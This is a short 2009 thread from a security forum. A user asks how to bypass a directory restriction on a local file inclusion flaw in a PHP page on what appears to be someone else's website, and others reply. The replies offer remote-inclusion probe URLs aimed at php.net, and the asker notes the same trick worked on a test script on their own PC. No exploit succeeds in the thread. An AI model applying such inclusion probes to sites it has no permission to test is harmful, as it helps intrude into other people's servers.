|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 141
Members: 0
Total: 141
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
LFI dir restriction? |
|
Posted: Fri Feb 06, 2009 10:15 pm |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
URL:
Code: |
Warning: include(./id/asdf.php) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\host\site.com\httpdocs\inf.php on line 48
Warning: include() [function.include]: Failed opening './id/asdf.php' for inclusion (include_path='.;./includes;./pear') in C:\Inetpub\host\site.com\httpdocs\inf.php on line 48
|
Restricted to dir /id? Is there a way to bypass this? |
|
|
|
|
|
Re: LFI dir restriction? |
|
Posted: Fri Feb 06, 2009 10:40 pm |
|
|
tehhunter |
Valuable expert |
|
|
Joined: Nov 19, 2008 |
Posts: 261 |
|
|
|
|
|
|
|
-AO- wrote: | URL:
Code: |
Warning: include(./id/asdf.php) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\host\site.com\httpdocs\inf.php on line 48
Warning: include() [function.include]: Failed opening './id/asdf.php' for inclusion (include_path='.;./includes;./pear') in C:\Inetpub\host\site.com\httpdocs\inf.php on line 48
|
Restricted to dir /id? Is there a way to bypass this? | It seems like the script just adds ('.php') on to the end of the script. You can try to to redirect to a different website. Try these:
Code: | inf.php?id=http://www.php.net/index
inf.php?id=http://php.net/index
inf.php?id=www.php.net/index
inf.php?id=php.net/index |
See if anything shows up in any of these queries. |
|
|
|
|
|
|
|
|
Posted: Fri Feb 06, 2009 11:13 pm |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
Quote: | inf.php?id=http://www.php.net/index
inf.php?id=http://php.net/index
inf.php?id=www.php.net/index
inf.php?id=php.net/index |
These didn't work
register_globals and url_include are probably off. |
|
|
|
|
Posted: Sat Feb 07, 2009 8:56 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
This is Windows Server dude's. |
|
|
|
|
Posted: Sun Feb 08, 2009 12:17 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
I set up a script vulnerable to inclusion on my windows pc and it worked. What's the difference? |
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|